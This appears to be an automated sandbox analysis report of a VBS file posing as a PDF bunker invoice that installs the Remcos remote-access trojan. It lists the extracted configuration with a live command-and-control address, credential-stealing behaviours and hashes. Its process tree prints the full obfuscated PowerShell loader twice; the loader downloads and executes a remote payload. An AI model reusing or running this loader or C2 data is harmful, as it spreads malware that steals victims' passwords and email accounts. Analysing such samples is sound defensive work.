Overview

overview

10

Static

static

1

BUNKER INV...df.vbs

windows7-x64

10

BUNKER INV...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 09:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BUNKER INVOICE ‘MV.SUN OCEAN.pdf.vbs

  • Size

    17KB

  • MD5

    8728fd6ce048778714ac79991e78bbea

  • SHA1

    2dd28d298edf6af2ca9f1511d92545c5a3f470a3

  • SHA256

    736b1fd992d69ce4f46a4f4fa5b892e659536c493224b68c022d8fd193c5e88a

  • SHA512

    9c08b2a198adf14071d86eab3b1c29bec9bbad390952c43f06d1964231df5540fe807ae2d98d7b2198ced3ce9d519352ac4f4b87b25901424794463871fe601a

  • SSDEEP

    384:UzVKy+Tt5Q4Lemns5EuZdETHH+ouUY+cTVCtRFBBKg:qVx+Tt5UGsLErLuQc+nBJ

Score
10/10
remcosremotehostcollectiondiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.18.157:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-N639VY

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BUNKER INVOICE ‘MV.SUN OCEAN.pdf.vbs"
    1⤵
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious use of WriteProcessMemory
    PID:3580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Acronycta='Brainworker';;$Macrophytic='Yacca';;$Boardy='Bogskrivningernes';;$Quinquedentate9='synoptist';;$Mijas='Fjern';;$Escalator=$host.Name;function Dagligvarebutikker($Lumsker){If ($Escalator) {$Udloddes=3} for ($Chessart=$Udloddes;;$Chessart+=4){if(!$Lumsker[$Chessart]) { break }$deskriptioners+=$Lumsker[$Chessart]}$deskriptioners}function Taurobolia($Lougheen){ .($Aandedraget) ($Lougheen)}$Gstet=Dagligvarebutikker ' UnNPreeventM s.supwsudETalb WiCB,dL LaIOpseT.enCocT';$smocker=Dagligvarebutikker 'E.oM VeoWilzMusi eml lblKreaN n/';$stemwards=Dagligvarebutikker ',alTGrolJonsObd1Cur2';$omhyggeligstes='B.o[volN ,ne asT Tm.ThesBoreGiorOveV K I MacTreE pip T oskri ilNXenTLamm ,oa U NHa,ALi,gstiETudRNec] o:An :IndsWorEsj Crevu itRCleI Fat TiyEnupr tr eloClatCiroDrkC ffOseiLEjv=Cy $Flis MaT GrELufM ReW emaPonr CudAnas';$smocker+=Dagligvarebutikker 'so 5B t. Fl0 .r til(ColWproiGe.n b,di doAb wOvos to BeaNGnoT i Che1Vel0fre.Di 0 M.; m T.rWAfsi sonAfd6Bun4Mi.;Rev Vikx ,a6Aec4 Ab; mt U,r Div.tr:Hem1 ea3Gar1 H..Brg0Ank)T l forGRuge OvcHaskHatoUle/P.r2Gri0 Bo1Tak0Und0 b1Koi0P l1 M. EnFMedi rnr Kae UnfDyroPrex,lo/Unv1D m3Met1dys.Ci 0';$Apteringernes=Dagligvarebutikker 'Meaugris axE OyR ni- ra .ugsk.eDipnNont';$Gummiest=Dagligvarebutikker 'OvehEpitPretOpipsi :s,u/pja/ R.csuphTakp.puqHon2Me,.Weri,roc,uluBr / snH.aruT sQ VaQLiguHenEPetA aOPre/RevKNetlQuao ila riksereG ar uaiAf.nMu,gDi,s euoRejmM,ar A.aZodaUridA,cesmar G,ncuceBus.sp.c BosFalv';$Behoerig=Dagligvarebutikker ',le>';$Aandedraget=Dagligvarebutikker 'MilIIntEH,rX';$Henriettas='Alterationen';$Micrometers='\Lacertilian.Rev';Taurobolia (Dagligvarebutikker 'K o$ PrgAc LHano FiB.isaso lAne:JalAFumTen TDybRO eAteahMinEi eNZo.t Iz=Ges$ OhEEren ByVPr :BasADo PUskPAppdsluAspiTd.saHum+ yk$ olmsk iVrdcFlyrJe,OMarmEleeKamtPh.ecr,rKros');Taurobolia (Dagligvarebutikker ' ub$FugGsprl lmoT,mbOuaatr l Ba:,jspTz R s.E Rep mraConcAfsKBusI,ntnRkkgJv,=Mo $ DeGun UsubM Fim BjIGibeGits ektI,d.TvasPropChaLHigisoaT nd(V,a$skuBW.lEMorhunco spEBurRUntIKreGPos)');Taurobolia (Dagligvarebutikker $omhyggeligstes);$Gummiest=$Prepacking[0];$Bodemiddel=(Dagligvarebutikker 'E s$ s gBrnL HaOFamb BrARkklsem:BursWhiI yrp smiPr,dT fispetNudys u=FornTi.ETvaw sn-K uoBaabTopjUdpe icc,iptsva un.sLegYFodsskgtKapeCurmNo,.Ale$ afGVu.sE htLevEBa t');Taurobolia ($Bodemiddel);Taurobolia (Dagligvarebutikker 'A r$ Erss yisemp TaistrdP aiTurtUnhyEbr.LucHExteIntaPredOpse arIncs Ka[K.e$ fhAMelpRect.eme arr AmiEffnReegOpieOmsrKiln L.e sts se] Re=K,a$AffsBrnmVocosp cL bkUdve eir');$Worlded=Dagligvarebutikker 'tun$TonsDekiHaapAnvi I.dUn.iVert fryRak. HtDU ko swforn lmlBl.oIdraAurdPolF spiVall UneFun(Cot$MotGIntuOutmT rmTraiParesacs nbt Ho,Tyk$ DyBComeproaLymvR de G.rk piArmtR se .n2sem2 Fl4Con)';$Beaverite224=$Attrahent;Taurobolia (Dagligvarebutikker 'Bes$Preg R LKnkOKarbDomAPrvLWas: patsirHDeaeP,aoFl,m jeaFlaN etiPica.rg=Gen(PattGasE D.s,taTGas-skapUn.a BiTAmpHTil ke $Vi B Keed,ta iVCh.E noRZalI O.TBekeD.s2Dy 2 s4Bek)');while (!$Theomania) {Taurobolia (Dagligvarebutikker ' st$Pa gKoklFreoskub Koahall tr:H sT.kaiN,nlManiUnrnOphtFreeM ntCrugU.poskae cirsldee el Casbe eP.l=Ryg$FodK HoiLoteB,nfB ofs,le.ngr') ;Taurobolia $Worlded;Taurobolia (Dagligvarebutikker 'skrsMulTAltA dbrs.eTLe - LesskoLLaxEUnre.ndpHrd ,ic4');Taurobolia (Dagligvarebutikker 'til$An Grl LCl,OBrab rAB aL Em:,orTPashungeTseOBedM asA eknDisIO eaB,f=Tit(AnsTI tEH as K t ,a- DipbleA P TPolHUdd ae$ Deb WaET.saAttvchaEForR.ntiWistNapesun2.aa2U,r4War)') ;Taurobolia (Dagligvarebutikker 'Lsk$ smG .tlR doPh b aastklJen:Omfi,orr irTwiECatvskoEFi Rarge U n pat ilITypA I,l G.=Bla$Ha gsk lIdeoDribOvna svl Fr: EpDKobEPornsinustrDMo EscrR oesFri+str+mal% a $Misp spR esE kipMa,aNoocVenkDriIAftn LiGBlo.Forcsolo C u Gen,ndT') ;$Gummiest=$Prepacking[$Irreverential]}$Deplane=329663;$Festae=29903;Taurobolia (Dagligvarebutikker 'sar$ApoGForl.opORa BfinadagL Fo: G EKunN arsNo PfirnPr,d ve.irrsupnZooableTFanU PrrF reAftn etsAnd Bgr=Vid U.mG onepreTCaf-NumcInwoBa NM mT smEsliN ClTNie Fe$O hB tyEJubACrivCanEsp RAutifrutMasEse 2Dis2P.s4');Taurobolia (Dagligvarebutikker 'Gen$ Mug .llBlyoKy.b loaFemlsul:ParMLauo FonPreo Kel vei Din.utgBulu E aNecl esfau ef= c Od [FinsLnkyEllsV jtDiseCarm Ko.OveC.ilos vnPlov speJ mr rt.on] ow:Re :.uaF ,frProoPram UlBMeda KesConeNon6spe4s usPiptForr PeiBednMe.gGru(Khm$HovEPr.n AmsDospfr nMa dVi e irrM.nnReaaWidt eauAndrskaeT,en TusRaz)');Taurobolia (Dagligvarebutikker 'al $UdtG salK.rOkraBBanaL bLCo :HooF .kIBalsN,dkB eeDisFKarLVioA,veagumdbadEstar M nAs es,asRso Hy= Tv Un [CausNedy ysMeatAldEal Msub.phat AkE Dex ontTr .MicesarNPrvc CooUn,dsm I randuags.a] O.:fi,: FoAGipsHerCPigIVexiCha.RedGHumeMo tInfs fgTsprR UfiBudnParg.na(Coe$ spm TaoP inUtto.apL .aiRhan W gPamuForaoutLBe.sBri)');Taurobolia (Dagligvarebutikker 'Enc$Re.GOr l ,io hbOstaPu Lsks:UnbkHalIMavRsegKAntE Tesse KDa,iCarBs.l= f$ iFdisIPiasCenkMare k F iLTa,aB uaNonDPi.ED sR agnAnaEHo sMim.s,ysP,oUAgebb dsskrt rrBh i ejnAg gspr( e$CacDamaeVi,PbevlPe ATviNCouePs,,Van$sekfHo E asB,aTsubaPa,e ,a)');Taurobolia $Kirkeskib;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2372
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Acronycta='Brainworker';;$Macrophytic='Yacca';;$Boardy='Bogskrivningernes';;$Quinquedentate9='synoptist';;$Mijas='Fjern';;$Escalator=$host.Name;function Dagligvarebutikker($Lumsker){If ($Escalator) {$Udloddes=3} for ($Chessart=$Udloddes;;$Chessart+=4){if(!$Lumsker[$Chessart]) { break }$deskriptioners+=$Lumsker[$Chessart]}$deskriptioners}function Taurobolia($Lougheen){ .($Aandedraget) ($Lougheen)}$Gstet=Dagligvarebutikker ' UnNPreeventM s.supwsudETalb WiCB,dL LaIOpseT.enCocT';$smocker=Dagligvarebutikker 'E.oM VeoWilzMusi eml lblKreaN n/';$stemwards=Dagligvarebutikker ',alTGrolJonsObd1Cur2';$omhyggeligstes='B.o[volN ,ne asT Tm.ThesBoreGiorOveV K I MacTreE pip T oskri ilNXenTLamm ,oa U NHa,ALi,gstiETudRNec] o:An :IndsWorEsj Crevu itRCleI Fat TiyEnupr tr eloClatCiroDrkC ffOseiLEjv=Cy $Flis MaT GrELufM ReW emaPonr CudAnas';$smocker+=Dagligvarebutikker 'so 5B t. Fl0 .r til(ColWproiGe.n b,di doAb wOvos to BeaNGnoT i Che1Vel0fre.Di 0 M.; m T.rWAfsi sonAfd6Bun4Mi.;Rev Vikx ,a6Aec4 Ab; mt U,r Div.tr:Hem1 ea3Gar1 H..Brg0Ank)T l forGRuge OvcHaskHatoUle/P.r2Gri0 Bo1Tak0Und0 b1Koi0P l1 M. EnFMedi rnr Kae UnfDyroPrex,lo/Unv1D m3Met1dys.Ci 0';$Apteringernes=Dagligvarebutikker 'Meaugris axE OyR ni- ra .ugsk.eDipnNont';$Gummiest=Dagligvarebutikker 'OvehEpitPretOpipsi :s,u/pja/ R.csuphTakp.puqHon2Me,.Weri,roc,uluBr / snH.aruT sQ VaQLiguHenEPetA aOPre/RevKNetlQuao ila riksereG ar uaiAf.nMu,gDi,s euoRejmM,ar A.aZodaUridA,cesmar G,ncuceBus.sp.c BosFalv';$Behoerig=Dagligvarebutikker ',le>';$Aandedraget=Dagligvarebutikker 'MilIIntEH,rX';$Henriettas='Alterationen';$Micrometers='\Lacertilian.Rev';Taurobolia (Dagligvarebutikker 'K o$ PrgAc LHano FiB.isaso lAne:JalAFumTen TDybRO eAteahMinEi eNZo.t Iz=Ges$ OhEEren ByVPr :BasADo PUskPAppdsluAspiTd.saHum+ yk$ olmsk iVrdcFlyrJe,OMarmEleeKamtPh.ecr,rKros');Taurobolia (Dagligvarebutikker ' ub$FugGsprl lmoT,mbOuaatr l Ba:,jspTz R s.E Rep mraConcAfsKBusI,ntnRkkgJv,=Mo $ DeGun UsubM Fim BjIGibeGits ektI,d.TvasPropChaLHigisoaT nd(V,a$skuBW.lEMorhunco spEBurRUntIKreGPos)');Taurobolia (Dagligvarebutikker $omhyggeligstes);$Gummiest=$Prepacking[0];$Bodemiddel=(Dagligvarebutikker 'E s$ s gBrnL HaOFamb BrARkklsem:BursWhiI yrp smiPr,dT fispetNudys u=FornTi.ETvaw sn-K uoBaabTopjUdpe icc,iptsva un.sLegYFodsskgtKapeCurmNo,.Ale$ afGVu.sE htLevEBa t');Taurobolia ($Bodemiddel);Taurobolia (Dagligvarebutikker 'A r$ Erss yisemp TaistrdP aiTurtUnhyEbr.LucHExteIntaPredOpse arIncs Ka[K.e$ fhAMelpRect.eme arr AmiEffnReegOpieOmsrKiln L.e sts se] Re=K,a$AffsBrnmVocosp cL bkUdve eir');$Worlded=Dagligvarebutikker 'tun$TonsDekiHaapAnvi I.dUn.iVert fryRak. HtDU ko swforn lmlBl.oIdraAurdPolF spiVall UneFun(Cot$MotGIntuOutmT rmTraiParesacs nbt Ho,Tyk$ DyBComeproaLymvR de G.rk piArmtR se .n2sem2 Fl4Con)';$Beaverite224=$Attrahent;Taurobolia (Dagligvarebutikker 'Bes$Preg R LKnkOKarbDomAPrvLWas: patsirHDeaeP,aoFl,m jeaFlaN etiPica.rg=Gen(PattGasE D.s,taTGas-skapUn.a BiTAmpHTil ke $Vi B Keed,ta iVCh.E noRZalI O.TBekeD.s2Dy 2 s4Bek)');while (!$Theomania) {Taurobolia (Dagligvarebutikker ' st$Pa gKoklFreoskub Koahall tr:H sT.kaiN,nlManiUnrnOphtFreeM ntCrugU.poskae cirsldee el Casbe eP.l=Ryg$FodK HoiLoteB,nfB ofs,le.ngr') ;Taurobolia $Worlded;Taurobolia (Dagligvarebutikker 'skrsMulTAltA dbrs.eTLe - LesskoLLaxEUnre.ndpHrd ,ic4');Taurobolia (Dagligvarebutikker 'til$An Grl LCl,OBrab rAB aL Em:,orTPashungeTseOBedM asA eknDisIO eaB,f=Tit(AnsTI tEH as K t ,a- DipbleA P TPolHUdd ae$ Deb WaET.saAttvchaEForR.ntiWistNapesun2.aa2U,r4War)') ;Taurobolia (Dagligvarebutikker 'Lsk$ smG .tlR doPh b aastklJen:Omfi,orr irTwiECatvskoEFi Rarge U n pat ilITypA I,l G.=Bla$Ha gsk lIdeoDribOvna svl Fr: EpDKobEPornsinustrDMo EscrR oesFri+str+mal% a $Misp spR esE kipMa,aNoocVenkDriIAftn LiGBlo.Forcsolo C u Gen,ndT') ;$Gummiest=$Prepacking[$Irreverential]}$Deplane=329663;$Festae=29903;Taurobolia (Dagligvarebutikker 'sar$ApoGForl.opORa BfinadagL Fo: G EKunN arsNo PfirnPr,d ve.irrsupnZooableTFanU PrrF reAftn etsAnd Bgr=Vid U.mG onepreTCaf-NumcInwoBa NM mT smEsliN ClTNie Fe$O hB tyEJubACrivCanEsp RAutifrutMasEse 2Dis2P.s4');Taurobolia (Dagligvarebutikker 'Gen$ Mug .llBlyoKy.b loaFemlsul:ParMLauo FonPreo Kel vei Din.utgBulu E aNecl esfau ef= c Od [FinsLnkyEllsV jtDiseCarm Ko.OveC.ilos vnPlov speJ mr rt.on] ow:Re :.uaF ,frProoPram UlBMeda KesConeNon6spe4s usPiptForr PeiBednMe.gGru(Khm$HovEPr.n AmsDospfr nMa dVi e irrM.nnReaaWidt eauAndrskaeT,en TusRaz)');Taurobolia (Dagligvarebutikker 'al $UdtG salK.rOkraBBanaL bLCo :HooF .kIBalsN,dkB eeDisFKarLVioA,veagumdbadEstar M nAs es,asRso Hy= Tv Un [CausNedy ysMeatAldEal Msub.phat AkE Dex ontTr .MicesarNPrvc CooUn,dsm I randuags.a] O.:fi,: FoAGipsHerCPigIVexiCha.RedGHumeMo tInfs fgTsprR UfiBudnParg.na(Coe$ spm TaoP inUtto.apL .aiRhan W gPamuForaoutLBe.sBri)');Taurobolia (Dagligvarebutikker 'Enc$Re.GOr l ,io hbOstaPu Lsks:UnbkHalIMavRsegKAntE Tesse KDa,iCarBs.l= f$ iFdisIPiasCenkMare k F iLTa,aB uaNonDPi.ED sR agnAnaEHo sMim.s,ysP,oUAgebb dsskrt rrBh i ejnAg gspr( e$CacDamaeVi,PbevlPe ATviNCouePs,,Van$sekfHo E asB,aTsubaPa,e ,a)');Taurobolia $Kirkeskib;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:3416
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\onxnjzgw"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2612
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zhkgjkryvfa"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:3576
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bjpykccsjnscwdm"
        3⤵
          PID:3404
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bjpykccsjnscwdm"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4404

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      8bfa339747e08a95bd734ba5329c5951

      SHA1

      f1fdb8d2e9cd2169d08c0e84de42471fa905288e

      SHA256

      29b8f47f85045ee2b4a7947a6ced4cc3d12e046828c3a2a7738c3c2e9253f8af

      SHA512

      0115270fb353ccd54bc6630198cff90dd78ac88819bc10ae056c89212b1e1b2c21b109cef19731c00be6cda6017fac3e2f168f69cef30655f2eac1a757d2be5e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4s52k24w.y3v.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\onxnjzgw
      Filesize

      4KB

      MD5

      c3c5f2de99b7486f697634681e21bab0

      SHA1

      00f90d495c0b2b63fde6532e033fdd2ade25633d

      SHA256

      76296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582

      SHA512

      7c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Lacertilian.Rev
      Filesize

      468KB

      MD5

      acbcb0c257c857aed90aa263a395e94b

      SHA1

      1ccb63ee28b87b954f3638ead3db54ede95294f6

      SHA256

      0a6d7238dbb1388bd77ba2a19bd8af53f58946fee29405939eac811fae0a187a

      SHA512

      4c4cfddc780239cefb68014dd07df5c12036e7704c0c535c6c1f1379aaf954ea0f5b077b1c4e9ddc2eb98e5696dd36c42c993b71d9b28dcbdeea01e6283b5b9e

      Download Submit

    • memory/2372-18-0x00007FF9CF1F0000-0x00007FF9CFCB1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2372-15-0x00007FF9CF1F0000-0x00007FF9CFCB1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2372-12-0x000001AADF220000-0x000001AADF242000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2372-0-0x00007FF9CF1F3000-0x00007FF9CF1F5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2372-11-0x00007FF9CF1F0000-0x00007FF9CFCB1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2372-10-0x00007FF9CF1F0000-0x00007FF9CFCB1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2612-52-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/2612-56-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/2612-53-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/2612-49-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/3416-69-0x0000000021F60000-0x0000000021F79000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3416-65-0x0000000021F60000-0x0000000021F79000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3416-82-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-81-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-80-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-79-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-78-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-77-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-76-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-44-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-75-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-74-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-73-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-72-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-71-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-70-0x0000000001240000-0x0000000002494000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3416-68-0x0000000021F60000-0x0000000021F79000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3576-50-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/3576-55-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/3576-57-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/3664-43-0x0000000008750000-0x000000000C71E000-memory.dmp

      Filesize

      63.8MB

      Download

    • memory/3664-40-0x0000000006F50000-0x0000000006F72000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3664-19-0x0000000004780000-0x00000000047B6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3664-20-0x0000000004DF0000-0x0000000005418000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3664-22-0x0000000005500000-0x0000000005566000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3664-37-0x0000000007570000-0x0000000007BEA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3664-38-0x0000000006290000-0x00000000062AA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3664-23-0x00000000055E0000-0x0000000005646000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3664-33-0x00000000056D0000-0x0000000005A24000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3664-36-0x0000000005D40000-0x0000000005D8C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3664-21-0x0000000005460000-0x0000000005482000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3664-35-0x0000000005D10000-0x0000000005D2E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3664-41-0x00000000081A0000-0x0000000008744000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3664-39-0x0000000006FC0000-0x0000000007056000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4404-54-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4404-59-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4404-58-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download